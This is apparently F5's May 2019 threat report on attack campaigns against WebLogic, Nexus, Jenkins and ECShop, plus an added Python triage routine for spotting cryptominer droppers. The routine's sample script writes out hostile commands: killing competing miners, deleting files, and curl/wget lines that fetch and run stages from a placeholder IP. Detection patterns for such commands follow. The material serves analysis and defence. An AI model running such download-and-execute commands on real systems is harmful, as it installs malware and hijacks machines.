Security researchers at F5 Networks constantly monitor web traffic at various locations throughout the world. This allows us to detect “in the wild” malware, and to get an insight into the current threat landscape. Here’s an overview of what we saw in May 2019.
Throughout the month of May, the team detected 10 new attack campaigns:
- Seven campaigns targeted two separate Oracle WebLogic server vulnerabilities: CVE-2017-10271 and CVE-2019-2725. Both make WebLogic servers vulnerable to unsafe deserialization, leading to remote code execution (RCE).
- In addition to the attacks exploiting Oracle WebLogic vulnerabilities, we tracked three additional attack campaigns:
  - Nexus Repository Manager 3 Remote Code Execution (CVE-2019-7238): The threat actor instructs the server to download and execute a cryptocurrency miner.
  - Jenkins access control list (ACL) bypass and metaprogramming RCE (CVE-2019-1003000): The threat actor instructs the server to download and execute a cryptocurrency miner.
  - ECShop Remote Code Execution: The threat actor tries to upload a webshell on a vulnerable server.
Oracle WebLogic Server Deserialization Remote Code Execution
Oracle WebLogic servers are widely used by corporations and have been vulnerable to various deserialization vulnerabilities. Over the last few months, we have detected campaigns targeting an Oracle WebLogic Server (WLS) Security Component vulnerability that leads to RCE. In this article, we’ll focus on some of the payloads sent by threat actors. For more information on the technical details behind the vulnerability, please read Vulnerabilities, Exploits, and Malware Driving Attack Campaigns in April 2019.
Cryptomining Malware: Plus (CVE-2017-10271)
Our honeypot received a new exploit request in which the threat actor tries to exploit CVE-2017-10271 to make the server download a malicious file from an IP address controlled by the threat actor.
Figure 1 shows the initial request received by our honeypot. An Oracle WebLogic server vulnerable to CVE-2017-10271 will download the malicious file from the IP address controlled by the threat actor and execute it. This malicious file displays telltale signs of a cryptocurrency miner. Most cryptominers look for other malicious processes already running on the server and kill them, which frees up server resources for their own mining.
Once processor resources are available, the threat actors use them to mine cryptocurrency. Figure 2 shows the content of the malicious file a vulnerable server is instructed to download. The first few lines of the file try to kill certain processes and remove a competing Kerberods cryptominer. In the second half of the file, it attempts to download and execute malicious files in the following order.
- Kok: Contains code for killing other competing malware
- Wow_ora: Watchdog to ensure the cryptominer is running
- Rc6: Downloads and executes the cryptominer
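As an added example, not part of the F5 article, the following Python triage routine flags the dropper pattern just described: kill commands aimed at competing miners, removal of the Kerberods competitor, and a chain of download-and-execute stages (kok, wow_ora, rc6). The sample script, the IP address and the download URLs are constructed for the example and do not come from the article.

```python
import re
from dataclasses import dataclass, field

# Constructed sample script modelled on the stage order the article describes.
# The IP address and file URLs are placeholders, not indicators from the article.
SAMPLE_SCRIPT = """#!/bin/sh
pkill -f xmrig
pkill -f cryptonight
rm -rf /tmp/kerberods
curl -fsSL http://203.0.113.10/kok -o /tmp/kok && chmod +x /tmp/kok && /tmp/kok
wget -q http://203.0.113.10/wow_ora -O /tmp/wow_ora; sh /tmp/wow_ora
curl -s http://203.0.113.10/rc6 | sh
"""

# Competitor miner names the article mentions; extend with others seen in the field.
COMPETITORS = ("kerberods",)

KILL_RE = re.compile(r"\b(pkill|killall|kill\s+-9)\b")
RM_RE = re.compile(r"\brm\s+-\w+\s+\S*(?P<name>" + "|".join(COMPETITORS) + r")", re.I)
FETCH_RE = re.compile(r"\b(curl|wget)\b[^\n|;&]*?(?P<url>https?://\S+)")
# A fetch counts as a stage only if the same line also executes the result.
EXEC_RE = re.compile(r"(\|\s*(ba)?sh\b|chmod\s+\+x|\bsh\s+/|\./)")


@dataclass
class Triage:
    kills: list = field(default_factory=list)                # lines killing processes
    removed_competitors: list = field(default_factory=list)  # competitor miners removed
    download_exec: list = field(default_factory=list)        # (url, stage name) in order


def triage_script(text: str) -> Triage:
    """Walk a downloaded shell script line by line and collect dropper indicators."""
    t = Triage()
    for line in text.splitlines():
        if KILL_RE.search(line):
            t.kills.append(line.strip())
        m = RM_RE.search(line)
        if m:
            t.removed_competitors.append(m.group("name").lower())
        m = FETCH_RE.search(line)
        if m and EXEC_RE.search(line):
            url = m.group("url").rstrip('";')
            t.download_exec.append((url, url.rsplit("/", 1)[-1]))
    return t


def is_miner_dropper(t: Triage) -> bool:
    """Verdict: kills competing processes and pulls at least one stage to execute."""
    return bool(t.kills) and len(t.download_exec) >= 1
```

Running `triage_script(SAMPLE_SCRIPT)` yields the three stages in the order the article lists them, which is the ordering a responder would want preserved when reconstructing the infection chain.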